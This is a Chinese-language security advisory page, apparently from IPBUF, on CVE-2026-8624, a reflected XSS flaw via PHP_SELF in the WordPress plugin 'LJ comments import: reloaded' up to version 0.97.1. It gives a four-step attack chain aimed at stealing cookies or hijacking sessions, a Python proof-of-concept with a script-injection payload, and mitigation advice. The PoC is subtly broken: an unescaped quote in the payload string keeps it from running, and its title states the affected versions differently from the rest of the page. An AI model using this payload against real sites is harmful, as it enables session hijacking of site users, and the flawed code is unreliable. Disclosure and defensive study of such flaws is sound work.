IPBUF安全漏洞报告
English
CVE-2026-8624 CVSS 6.1 中危

CVE-2026-8624 WordPress插件反射型XSS漏洞

披露日期: 2026-05-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-8624
漏洞类型
反射型跨站脚本攻击 (XSS)
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
LJ comments import: reloaded (WordPress Plugin)

相关标签

XSSWordPressReflected XSSWordPress PluginWeb SecurityCVE-2026-8624

漏洞概述

WordPress插件LJ comments import: reloaded在0.97.1及之前版本中存在安全漏洞。由于对输入清理和输出转义不足,攻击者可利用PHP_SELF参数发起反射型跨站脚本攻击(XSS)。未认证的攻击者能够诱导用户点击恶意链接,从而在页面中执行任意Web脚本,窃取用户信息或进行会话劫持。

技术细节

该漏洞的根源在于PHP超全局变量$_SERVER['PHP_SELF']的不安全使用。在PHP中,PHP_SELF不仅包含脚本文件名,还包含用户提供的PATH_INFO。插件在处理请求时,直接将PHP_SELF的值输出到HTML页面中,且未经过任何过滤或转义处理。具体而言,代码中存在两处直接echo该变量的位置。攻击者可以构造特制的恶意URL(例如在URI末尾附加包含JavaScript代码的路径信息),当受害者点击该链接时,服务器会将攻击者的输入直接反射回页面。由于缺乏输出编码,浏览器会将恶意代码当作HTML/JS解析并执行,从而触发XSS攻击。

攻击链分析

STEP 1
侦察
攻击者确认目标站点安装了LJ comments import: reloaded插件,且版本在0.97.1及以下。
STEP 2
构造Payload
攻击者利用PHP_SELF变量包含PATH_INFO的特性,构造包含恶意JavaScript代码的URL,例如在脚本路径后附加"><script>...</script>。
STEP 3
社会工程学
攻击者将构造好的恶意链接发送给目标用户(通常是管理员或拥有权限的用户),诱导其点击。
STEP 4
执行攻击
受害者点击链接后,服务器接收请求并将未经过滤的PATH_INFO直接输出到HTML响应中。受害者的浏览器解析响应并执行恶意脚本,导致Cookie被盗或会话被劫持。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# Exploit Title: WordPress Plugin LJ comments import: reloaded < 0.97.1 - Reflected XSS via PHP_SELF # Date: 2026-05-20 # Exploit Author: Analyst # Vendor Homepage: https://wordpress.org/ # Software Link: https://wordpress.org/plugins/lj-comments-import-reloaded/ # Version: <= 0.97.1 # Tested on: WordPress import requests target_url = "http://example.com/wp-content/plugins/lj-comments-import-reloaded/lj_comments_import.php" # Payload to inject script via PATH_INFO xss_payload = "/"><script>alert('XSS');</script>" full_url = target_url + xss_payload print(f"Sending request to: {full_url}") try: response = requests.get(full_url) if "alert('XSS')" in response.text: print("[+] Vulnerability confirmed! XSS payload reflected.") else: print("[-] Vulnerability not detected or payload filtered.") except Exception as e: print(f"Error: {e}")

影响范围

LJ comments import: reloaded <= 0.97.1

防御指南

临时缓解措施
如果不能立即升级插件,建议暂时禁用该插件以消除风险。对于开发者,应检查代码中所有使用$_SERVER['PHP_SELF']的地方,确保在使用前对其进行清理,或者使用$_SERVER['SCRIPT_NAME']作为替代。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表